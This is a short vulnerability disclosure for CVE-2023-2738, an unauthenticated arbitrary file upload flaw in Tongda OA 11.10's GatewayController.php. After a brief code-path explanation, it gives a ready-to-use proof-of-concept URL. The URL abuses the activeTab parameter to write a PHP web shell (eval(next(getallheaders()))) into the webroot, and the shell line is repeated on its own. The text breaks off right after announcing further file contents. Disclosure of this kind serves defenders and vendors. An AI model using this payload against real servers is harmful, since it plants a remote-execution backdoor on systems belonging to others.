Headline
CVE-2023-2738: cve/tongda.md at main · RCEraser/cve
A vulnerability classified as critical has been found in Tongda OA 11.10. This affects the function actionGetdata of the file GatewayController.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229149 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Tongda OA v11.10 has unauthorized arbitrary file upload vulnerability
official website:https://www.tongda2000.com/
version:v11.10
- The actionGetdata() method exists in the code general\appbuilder\modules\portal\controllers\GatewayController.php, where the activeTab parameter is controllable. In line 2018 the activeTab argument is in the GetData method.
In the GetData() method, query the id argument by findall to see if the array exists, and if the queried id does, enter the if statement on line 21. So the $attribute argument in line 38 is controllable, causing the array to be closed and thus written to the file via fwrite().
- The vulnerability reappears
poc
http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage
Write php files with fwrite(fopen()) through array closure, and bypass global filtering with no parameter.
<? php eval(next(getallheaders()));
Write the 2.php file with no argument, and the file contents are as follows.